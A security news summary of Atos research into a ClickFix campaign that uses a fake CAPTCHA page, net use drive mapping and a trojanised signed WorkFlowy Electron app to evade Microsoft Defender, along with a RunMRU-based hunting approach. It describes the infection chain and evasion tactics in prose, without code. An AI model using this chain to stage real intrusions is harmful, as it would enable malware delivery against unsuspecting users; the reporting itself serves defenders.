ClickFix attacks — where threat actors trick users into executing malicious commands through their own keyboard shortcuts — have typically relied on PowerShell or mshta as the execution layer. Researchers at Atos have now documented a variant that abandons both tools in favor of a less scrutinized Windows utility, producing an infection chain that evaded Microsoft Defender for Endpoint entirely.
According to the report, the attack begins at a fake CAPTCHA page hosted at happyglamper[.]ro. The page instructs visitors to open the Windows Run dialog via Win+R, then paste and execute a pre-loaded command using Ctrl+V and Enter — the standard ClickFix social engineering loop. What diverges here is what runs next.
Rather than invoking PowerShell or mshta directly, the injected command uses net use to map a network drive from an external server. A batch script — update.cmd — is then pulled from that mapped drive and executed, after which the drive is immediately removed. The report notes this technique, while not novel on its own, had not previously been observed in ClickFix campaigns.
The WorkFlowy Disguise
The batch script spawns a PowerShell instance that downloads a ZIP archive and extracts it to %LOCALAPPDATA%\MyApp\, then launches WorkFlowy.exe. The archive contains a legitimate WorkFlowy desktop application — version 1.4.1050, signed by developer FunRoutine Inc. and distributed as an Electron package. The legitimacy of the signed binary serves as a layer of plausible cover.
Electron applications bundle their source code inside .asar archives. The attackers replaced the legitimate resources/app.asar with a repackaged version containing injected malicious code inside main.js, the Node.js entry point. The researchers note the attackers used version 1.4 rather than the current v4.3, suggesting the repackaging was deliberate and version-specific. The injected code is a heavily obfuscated one-liner prepended to the legitimate application code, ensuring it executes first while blocking normal WorkFlowy functionality.
Because the malicious code runs in the Node.js main process — outside the Chromium sandbox — it operates with the full privileges of the logged-in user. No files beyond the archive itself are written to disk during execution, and the payload generates no OS-level persistence. The report states that if the command-and-control connection is not established, no files or directories are created at all. At the time of analysis, the C2 domain was already unresponsive.
More Read
Detection and Defense Posture
The campaign bypassed Microsoft Defender for Endpoint without triggering alerts. Atos security teams identified it only through an internal threat hunting service focused on a behavioral indicator specific to ClickFix: initial execution logged through the RunMRU registry key. The firm has published the corresponding hunting query in the report’s appendix.
The combination of factors — an uncommon initial execution method, a signed legitimate binary as a delivery vehicle, fileless in-memory execution, and payload concealment inside an .asar archive — gives the campaign a meaningful defensive evasion profile. The researchers assess these characteristics collectively offer adversaries a high probability of remaining undetected by standard endpoint controls.
Photo by Pixabay
This article is a curated summary based on third-party sources. Source: Read the original article
